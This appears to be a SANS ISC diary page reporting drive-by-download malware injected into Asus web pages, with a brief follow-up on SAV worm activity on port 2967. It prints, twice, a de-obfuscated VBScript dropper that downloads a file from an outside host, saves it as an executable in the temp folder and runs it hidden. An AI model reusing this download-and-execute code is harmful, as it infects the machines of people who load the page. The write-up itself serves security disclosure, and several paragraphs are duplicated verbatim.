Virus spreads from Asus Server
Robert has shared with us on a report that indicates drive-by-downloads injected in Asus pages:
http://www.heise-security.co.uk/news/82643
This is definitely not the first such cases. Websites that are not secure are favourite sources for attackers to use them as a platform to launch attack.
Our Handler, Lenny. has de-obfuscated version of the VBScript that triggered the download:
html
<script language="VBScript">
on error resume next
clID1 = "clsi"
clID2 = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "AdCount.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "http://www.yyc8.com/script/src/rss3.css"
Set df = document.createElement("object")
df.setAttribute "classid", clID1&clID2
Set x = df.CreateObject(XML1&XML2,"")
set S = df.createobject(AdoSqa1&AdoSqa2,"")
S.type = 1
x.Open oGet, dl, False
x.Send
set F = df.createobject(SFO,"")
set tmp = F.GetSpecialFolder(2)
fname1 = F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(SApp,"")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>Internet Explorer</title>
</head><body></body>
/html
http://www.heise-security.co.uk/news/82643
This is definitely not the first such cases. Websites that are not secure are favourite sources for attackers to use them as a platform to launch attack.
Our Handler, Lenny. has de-obfuscated version of the VBScript that triggered the download:
html
<script language="VBScript">
on error resume next
clID1 = "clsi"
clID2 = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "AdCount.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "http://www.yyc8.com/script/src/rss3.css"
Set df = document.createElement("object")
df.setAttribute "classid", clID1&clID2
Set x = df.CreateObject(XML1&XML2,"")
set S = df.createobject(AdoSqa1&AdoSqa2,"")
S.type = 1
x.Open oGet, dl, False
x.Send
set F = df.createobject(SFO,"")
set tmp = F.GetSpecialFolder(2)
fname1 = F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(SApp,"")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>Internet Explorer</title>
</head><body></body>
/html
Keywords:
0 comment(s)
SAV Worm Update
There is an increase on port 2967 attempts which is associated to the SAV worm for the last few days:
http://isc.sans.org/port_details.php?port=2967
eEye has a nice technical write up which provide an analysis of this worm. Check it out during your free time.
http://research.eeye.com/html/alerts/AL20061215.html
Symantec has also released virus definition pertaining to this worm:
Backdoor.Wualess.B
W32.Sagevo
http://isc.sans.org/port_details.php?port=2967
eEye has a nice technical write up which provide an analysis of this worm. Check it out during your free time.
http://research.eeye.com/html/alerts/AL20061215.html
Symantec has also released virus definition pertaining to this worm:
Backdoor.Wualess.B
W32.Sagevo
Keywords:
0 comment(s)
×
Diary Archives
Comments